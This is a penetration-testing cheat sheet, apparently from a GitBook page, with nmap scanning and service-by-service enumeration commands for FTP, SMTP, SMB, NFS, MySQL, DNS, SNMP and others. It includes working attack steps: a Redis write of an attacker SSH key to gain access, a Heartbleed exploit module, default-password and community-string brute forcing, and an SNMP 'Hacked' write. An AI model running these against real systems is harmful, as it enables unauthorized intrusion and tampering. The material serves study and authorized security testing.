Penetration Testing Scanning Password: hsaad.gitbook.io
TCP Behavior
send=SYN, recieve=SYN-ACK
send=SYN, recieve=RST-ACK
send=SYN, recieve=ICMP-Port-Unreachable
Blocked by Firewall (Filtered)
send=SYN, recieve=Nothing
Blocked by Firewall (Filtered)
UDP Behavior
send=UDP, recieve=UDP-response
send=UDP, recieve=ICMP-Port-Unreachable
Port Close OR Blocked by Firewall
send=UDP, recieve=Nothing
Port Close OR Blocked by Firewall OR Port Open but it is looking for specific data in UDP payload, nmap result: (Open|Filtered)
Port Scanning
Copy # Host Discovery (Internal)
nmap -sn 192.168.43.164 --reason -v -n
# Host Discovery (External)
nmap -sn 8.8.8.8 --reason -v -n ARP protocol if (local network).
ICMP protocol if (run as root).
TCP protocol on port 443 through SYN packet.
TCP protocol on port 80 through ACK packet.
Copy # TCP Port Scanning
nmap 192.168.43.164 --reason -v -n
# UDP Port Scanning
nmap 8.8.8.8 -Pn -sU -p53,161 -v -n
# MIX Port Scanning
nmap 192.168.1.1 -sS -sU -p U:53,111,161,T:21-25,80,445
# Wireshark Filter
ip.addr==192.168.43.164 and tcp.flags.ack==1 and tcp.flags.syn==1
ip.addr==192.168.43.164 and tcp.port==80
Copy # Print Top 10 Ports
sort -r -k3 /usr/share/nmap/nmap-services | grep "/tcp" | head -n 10
# Scan Top 10 Ports
nmap 8.8.8.8 --reason -v -n --top-ports 10
Copy # Version Scanning
nmap 192.168.43.164 --reason -v -n -sV Vulnerability Scanning
Copy # Scripts Location
ls -l /usr/share/nmap/scripts/
cat script.db | grep -E "vuln|exploit"
nmap 192.168.43.164 --reason -v -n -sV --script vuln,exploit
nmap 192.168.43.164 --reason -v -n -sV --script default # Or -sC
nmap 192.168.43.164 --reason -v -n --script smb-vuln* Enumeration
FTP (21)
Copy nc 10.0.2.9 21
> USER anonymous
> PASS anonymous
ftp 10.0.2.9 21
> help
> ascii | binary
> pwd # print current directory on remote host
> ls # list files on remote host
> lcd # print current directory on local host
> !ls # list files on local host
> get /home/test/file.txt /home/msfadmin/file.txt # download files
> put /home/msfadmin/file.txt /home/test/file2.txt # upload files SMTP (25)
Copy # Telnet
telnet 192.168.1.104 25
# method 1 (VRFY)
> VRFY msfadmin
# method 2 (RCPT)
> MAIL FROM:msfadmin
> RCPT TO:msfadmin
# method 3 (EXPN)
# Metasploit
use auxiliary/scanner/smtp/smtp_enum
# SMTP-User-Enum Users
smtp-user-enum -M VRFY -U unix_users.txt -t 192.168.1.104
# SMTP-User-Enum Emails
smtp-user-enum -M VRFY -D mega.local -U unix_users.txt -t 192.168.1.104
# Users Wordlist
/usr/share/metasploit-framework/data/wordlists/unix_users.txt
/usr/share/seclists/Usernames/Names/names.txt HTTP/HTTPS (80,443)
Note: Hostnames may be found in SSL Cert or DNS or Source Code.
Copy # Directory Brute Force
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 10.10.10.56
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 10.10.10.56/cgi-bin/ -f -x php,txt,conf,sh,cgi
# SSL Cert Dump
echo | openssl s_client -connect 10.0.2.9:443 2>/dev/null | openssl x509 -noout -text | grep DNS:
# HeartBleed
nmap -sV --script=ssl-heartbleed 192.168.101.8
# Exploit
use auxiliary/scanner/ssl/openssl_heartbleed
set RHOSTS 192.168.101.8
set verbose true
run POP3 (110)
Copy telnet 192.168.1.105 110
> USER pelle@192.168.1.105
> PASS admin
# List all emails
list
# Retrive email number 5, for example
retr 5 RPCbind (111)
SMB (139,445)
Copy # Who Run SMB
nbtscan -r 192.168.100.0/24
# NULL Session
rpcclient -U "" -N 10.0.2.4
> enumdomusers
> queryuser 0x3e8
# Session with username and password
rpcclient -U "test" 10.0.2.4
# Enum4Linux
enum4linux -{U|S|P|G} 10.0.2.4
enum4linux -{U|S|P|G} -u TestUser -p TestPass 192.168.100.200
# List Shares
smbmap -H 192.168.0.34
smbmap -u TestUser -p TestPass -H 192.168.0.34
smbclient -L 192.168.0.76
smbclient -U TestUser -L 192.168.0.70
# Access Shares
smbclient //192.168.0.70/tmp
smbclient -U TestUser //192.168.0.70/tmp NFS (2049)
Copy # Show mounted partitions
showmount -e 192.168.1.109
# Connect to specific partition
mount 192.168.1.109:/ /tmp/NFS
# Disconnnect
umount /tmp/NFS MySQL (3306)
Copy # try default passwords root OR toor OR empty
mysql -h 192.168.1.101 -u root -p Disctcc (3632)
Copy # Disctcc v1 expoit
https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855 Redis (6379)
Copy ssh-keygen -t rsa -f outkey
(echo -e "\n\n"; cat outkey.pub; echo -e "\n\n") > foo.txt
cat foo.txt | redis-cli -h 127.0.0.1 -x set crackit
redis-cli -h 127.0.0.1
ping
config get dir
config get *
config set dir /home/user/.ssh
config set dbfilename authorized_keys
save
ssh -i outkey redis@127.0.0.1
wget https://raw.githubusercontent.com/koboi137/john/bionic/ssh2john.py
python ssh2john.py outkey > outkey.txt
john --wordlist=/usr/share/wordlists/rockyou.txt outkey.txt DNS (53)
Copy # Lookup & Zone Transfer
host domain.name 8.8.8.8
host 1.1.1.1 8.8.8.8
host -t axfr domain.name dns-server
# Information Disclosure
dig @41.217.225.50 hostname.bind txt chaos
dig @41.217.225.50 version.bind txt chaos NTP (123)
Copy # NTP Mode 6 Query
ntpq -c rv IP
use scanner/ntp/ntp_unsettrap_dos SNMP (161)
Copy # Brute Force
nmap -sU --open -p 161 192.168.1.0/24
onesixtyone -c community.txt 192.168.1.244
onesixtyone -c community.txt -i ips.txt
# SNMP walk & set
snmpwalk -v1 -c public -t 10 192.168.1.244 > snmp.txt
snmpwalk -v1 -c public 192.168.1.244 iso.3.6.1.2.1.6.13.1.3 // Open ports
snmpset -v1 -c private 10.0.2.10 iso.3.6.1.2.1.1.5.0 s Hacked
# Metasploit
msfconsole
> use auxiliary/scanner/snmp/snmp_enum
> set rhosts 192.168.1.244
> run